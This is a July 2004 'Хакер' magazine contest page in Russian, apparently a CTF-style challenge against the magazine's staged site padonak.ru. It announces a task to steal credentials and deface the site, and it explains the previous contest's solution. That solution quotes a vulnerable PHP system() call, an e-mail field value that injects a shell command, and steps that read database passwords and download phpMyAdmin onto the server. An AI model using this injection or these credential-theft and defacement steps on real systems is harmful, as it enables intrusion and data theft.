Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР #67, ИЮЛЬ 2004 г.

X-КОНКУРС: звездный календарь

 

Xakep, номер #067, стр. 067-061-1

Привет! Колись, прошел конкурс июньского номера? Если нет, то не расстраивайся, вставляй диск с номером 2 и смотри видео о том, как надо было ломать падонков месяц назад. Ну а если прошел, то поздравляю тебя и виртуально жму твою умелую руку! Только ты долго что-то хаксорил. Бери пример с ?????????? - он сделал это первым, поэтому и получит рулезный приз - мега_пупер_кульную ??????????! ?????????! Подваливай в редакцию и забирай ее. Кстати, заодно и с Х-crew познакомишься :). А теперь о деле. Как ты уже догадался, я хочу сейчас рассказать, в чем будет заключаться задание следующего конкурса. Тебе, конечно же, не терпится узнать, чем решили заняться ПаДоНкИ в этот раз. В этот раз они решили написать для сайта www.padonak.ru звездный календарь, раскрутить его и продавать в будущем результаты гадания за WebMoney. Ну а тебе нужно показать им, кто в их доме хозяин, и поломать их сайт www.padonak.ru. Вот, собственно говоря, что конкретно нужно сделать:

1) В херомант-скрипте находишь баг.

2) На сайте есть база данных, а в ней - таблица с учетными записями юзверей. Из этой таблицы ты выдираешь все логины с паролями.

3) Один из пассов может подойти к FTP, ну а логин тебе придется узнать своими средствами.

4) Заходишь на сайт по FTP-протоколу и делаешь красивый дефейс.

5) После этого на мыло конкурса konkurs@real.xakep.ru присылаешь логин с паролем от FTP-доступа и скриншот подмены главной страницы в формате BMP.

Оценивать будем дефейсы первых трех чуваков, которые пройдут конкурс. Однако награждать станем только одного из них. Чей дефейс окажется самым красивым, тот и станет победителем.

Как пройти июньский конкурс

Фича июньского конкурса заключалась в баге, которую содержал скрипт регистрации reg.php. Письма, содержавшие код активации, отправлялись с помощью всего лишь одной строчки php-кода, которая выглядела так:

system("echo "user: $login, pin: $pin". Активизацию аккаунта можно произвести на этой странице: http://padonak.ru/active.php | mail $email");

Если при регистрации в поле "e-mail" ты ввел бы, например, "b00b1ik@polnyj.loh; ls -la", исполнилась бы команда операционной системы "ls -la" и ты получил бы содержимое текущей директории. Итак, шелл-доступ у тебя теперь есть. Вытаскиваешь логин с паролем из файла конфигурации mycfg.php и сливаешь какой-нить MySQL-клиент (лично я пользовался phpMyAdmin'ом). Сначала командой "fetch http://voxel.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.5.7.tar.gz" слил его, потом распаковал в текущую директорию, используя команду оболочки оси "tar xzvf phpMyAdmin-2.5.7.tar.gz". Осталось только настроить его. Для этого просто-напросто в файле config.inc.php прописываем выдранный из mycfg.php логин с паролем. Теперь через админ-интерфейс заходим на главную пагу установленного phpMyAdmin'a, просматриваем содержимое секретных таблиц через удобный интерфейс и шлем их на мыло конкурса. Вот так :)

CD

На нашем диске ты можешь найти видео по взлому, посвященное прохождению конкурса.

Содержание
ttfb: 3.2880306243896 ms